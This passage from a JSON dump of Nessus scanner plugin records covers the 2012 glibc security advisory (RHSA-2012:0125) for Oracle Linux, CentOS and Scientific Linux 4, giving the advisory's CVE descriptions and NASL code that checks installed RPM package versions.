\"CVE-2011-4609\");\n script_bugtraq_id(40063, 46563, 46740, 47370, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0125\");\n\n script_name(english:\"Oracle Linux 4 : glibc (ELSA-2012-0125)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0125 :\n\nUpdated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-February/002604.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"glibc-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"nscd-2.3.4-2.57\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:27:30", "description": "Updated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 25, "published": "2012-02-14T00:00:00", "title": "CentOS 4 : glibc (CESA-2012:0125)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-02-14T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:nscd", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-profile", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc", "p-cpe:/a:centos:centos:nptl-devel"], "id": "CENTOS_RHSA-2012-0125.NASL", "href": "https://www.tenable.com/plugins/nessus/57923", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0125 and \n# CentOS Errata and Security Advisory 2012:0125 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57923);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46563, 46740, 47370, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0125\");\n\n script_name(english:\"CentOS 4 : glibc (CESA-2012:0125)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-February/018427.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?04137bde\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-0296\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"nscd-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"nscd-2.3.4-2.57\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:46:22", "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nThis update also fixes the following bug :\n\n - When using an nscd package that is a different version\n than the glibc package, the nscd service could fail to\n start. This update makes the nscd package require a\n specific glibc version to prevent this problem.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 15, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : glibc on SL4.x i386/x86_64 (20120213)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-08-01T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:glibc-profile", "p-cpe:/a:fermilab:scientific_linux:nscd", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:nptl-devel", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:glibc-headers"], "id": "SL_20120213_GLIBC_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61243", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61243);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-4609\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL4.x i386/x86_64 (20120213)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nThis update also fixes the following bug :\n\n - When using an nscd package that is a different version\n than the glibc package, the nscd service could fail to\n start. This update makes the nscd package require a\n specific glibc version to prevent this problem.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1202&L=scientific-linux-errata&T=0&P=2559\n script_set_attribute(\n attribute:\"see_also\",\n 